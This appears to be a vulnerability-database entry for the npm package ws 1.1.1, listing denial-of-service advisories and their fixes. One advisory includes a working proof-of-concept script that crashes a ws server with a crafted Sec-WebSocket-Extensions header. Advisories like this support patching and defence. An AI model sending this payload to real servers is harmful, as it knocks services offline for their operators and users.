Search for packages
| purl | pkg:npm/ws@1.1.1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-4851-mkc2-pqdw
Aliases: GMS-2017-331 |
Denial of Service A specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash. |
Affected by 1 other vulnerability. |
|
VCID-4u5m-kp7t-x3cf
Aliases: GHSA-5v72-xg48-5rpm GMS-2019-145 |
Denial of Service in ws Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r' ].join('\r'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` ## Recommendation Update to version 3.3.1 or later. |
Affected by 0 other vulnerabilities. Affected by 1 other vulnerability. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-37mw-j411-a3az | Improper Input Validation ws is a "simple to use, blazing fast and thoroughly tested websocket client, server and console for node.js, up-to-date against RFC-6455". By sending an overly long websocket payload to a `ws` server, it is possible to crash the node process. This affects ws 1.1.0 and earlier. |
CVE-2016-10542
GHSA-6663-c963-2gqg |
| VCID-hedn-18sd-bba2 | DoS due to excessively large websocket message It is possible to crash the node process by sending an overly long websocket payload to a ws server. |
GMS-2016-38
|